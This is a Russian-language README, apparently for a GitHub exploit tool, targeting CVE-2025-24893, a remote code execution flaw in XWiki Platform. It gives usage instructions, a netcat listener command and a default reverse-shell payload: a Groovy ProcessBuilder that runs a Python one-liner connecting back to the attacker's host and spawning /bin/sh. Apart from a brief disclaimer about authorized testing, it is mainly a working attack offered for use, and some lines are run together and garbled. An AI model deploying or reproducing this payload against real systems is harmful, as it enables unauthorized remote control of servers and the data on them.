
Модифицированный эксплойт для CVE-2025-24893
Простой скрипт на Python3 для эксплуатации CVE-2025-24893 — уязвимости удалённого выполнения кода в XWiki Platform, использующей асинхронный макрос на основе Groovy и настраиваемый payload для обратной оболочки.
⚠️ ВНИМАНИЕ: Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно и неэтично.
ProcessBuilder для обхода особенностей Runtime.execrequestspip install requests
Клонируйте этот репозиторий:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN>
Хост XWiki (например, wiki.example.local).
<LHOST>
IP вашей атакующей машины (где запущен ваш слушатель).
<LPORT>
Порт вашего слушателя (целое число).
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat-слушатель на наличие оболочки.Перед отправкой payload скрипт:
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN>Это помогает обеспечить совместимость с развёртываниями, использующими смешанные протоколы.
По умолчанию скрипт использует однострочник на Python3:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload(), если вам нужна другая оболочка (например, Bash, Perl, PHP и т. д.).Этот проект лицензирован в соответствии с лицензией MIT. Подробности см. в файле LICENSE.
Этот инструмент предназначен только для авторизованной оценки безопасности и образовательных целей. Авторы не несут ответственности за неправомерное использование. Всегда получайте явное разрешение перед тестированием любых целевых систем.